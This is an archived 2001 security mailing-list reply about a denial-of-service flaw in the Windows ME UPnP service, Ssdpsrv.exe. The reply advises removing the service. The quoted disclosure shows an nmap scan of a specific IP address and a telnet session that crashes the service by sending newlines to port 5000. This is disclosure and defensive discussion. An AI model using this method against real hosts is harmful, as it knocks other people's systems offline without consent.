Re: Ssdpsrv.exe in WindowsME

From: Alan Wright (AlanJWright@manx.net)
Date: 10/19/01


Message-Id: <5.1.0.14.0.20011018231914.00aba3c0@mail.manx.net>
Date: Thu, 18 Oct 2001 23:25:00 +0100
To: "milo omega" <mtwoar@hotmail.com>
From: Alan Wright <AlanJWright@manx.net>
Subject: Re: Ssdpsrv.exe in WindowsME

This is a cross post out of general interest to security basics.
Firstly you have to wonder why someone is running this service.
I personally only found out after using a ports traffic analyzer. I will
pass the url for the program on if you want it but do not want to be seen
to plug if against the rules of the forum. :-)

Secondly Windows Millenium installs the service without telling you that it
has done so when you do a basic install.
Remove it using Control Panel, Add/Remove progs ,windows setup.
communications, ckick on Universal plug and pray, (sic) and then apply.

At 19:46 17/10/2001 -0500, you wrote:
>By connecting to a computer running Ssdpsrv you are able to crash the
>Ssdpsrv server.
>
>Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
>This service comes standard with the WindowsME installation.
>
>The Ssdpsrv.exe server is started at boot.
>Here is the registry entry:
> KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
>Here is the file that starts the server:
> c:\windows\system\ssdpsrv.exe
>
>For information about UPnP go here:
> http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
>Upon running a scan on a computer running the server I get the following:
><snip>
> bash-2.05$ nmap -sT 165.121.234.217
> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
> Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
> (The 1547 ports scanned but not shown below are in state: closed)
> Port State Service
> 139/tcp open netbios-ssn
> 5000/tcp open fics
> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
></snap>
>
>Method to crash Ssdpsrv:
> Connect to the computer on port 5000.
> Send 3 to 5 newline characters.
> You then get an error and are disconnected.
><snip>
> bash-2.05$ telnet 165.121.234.217 5000
> Trying 165.121.234.217...
> Connected to 165.121.234.217.
> Escape character is '^]'.
>
>
>
> HTTP/1.1 400 Bad Request
>
> Connection closed by foreign host.
> bash-2.05$
></snap>
>
>Here is the error caused by the crash:
> Ssdpsrv has caused an error in MSVCRT.DLL.
> Ssdpsrv will now close.
> If you continue to experience problems,
> try restarting your computer.
>
>This causes the server crash and closes port 5000.
>Either you must restart the server by manually running ssdpsrv.exe
>or reboot.
>
>shouts to pulltheplug #c.
>:o
>
>_________________________________________________________________
>Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

All the best

Alan

Alan J Wright B.Sc(Hons)(Open)
SMS +47624462772.
Email AlanJWright@manx.net
         foll478trap@yahoo.com

'You're a feisty little one but you'll soon learn respect'

Return of the Jedi



Relevant Pages

  • RE: Ssdpsrv.exe in WindowsME
    ... with ME preinstalled) and it too is running the ssdpsrv. ... > Subject: Ssdpsrv.exe in WindowsME ... > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. ... > Connect to the computer on port 5000. ...
    (Bugtraq)
  • Re: Ssdpsrv.exe in WindowsME
    ... Subject: Ssdpsrv.exe in WindowsME ... In fact I found two more DOS attacks than just crashing the server. ... > I personally only found out after using a ports traffic analyzer. ... >> By connecting to a computer running Ssdpsrv you are able to crash the ...
    (Security-Basics)
  • Re: Ssdpsrv.exe in WindowsME
    ... Subject: Ssdpsrv.exe in WindowsME ... > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. ... > This service comes standard with the WindowsME installation. ... Interesting ports on ninja: ...
    (Bugtraq)
  • Re: Ssdpsrv.exe in WindowsME
    ... Subject: Ssdpsrv.exe in WindowsME ... Ssdpsrv.exe does not crash. ... > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. ... > Connect to the computer on port 5000. ...
    (Bugtraq)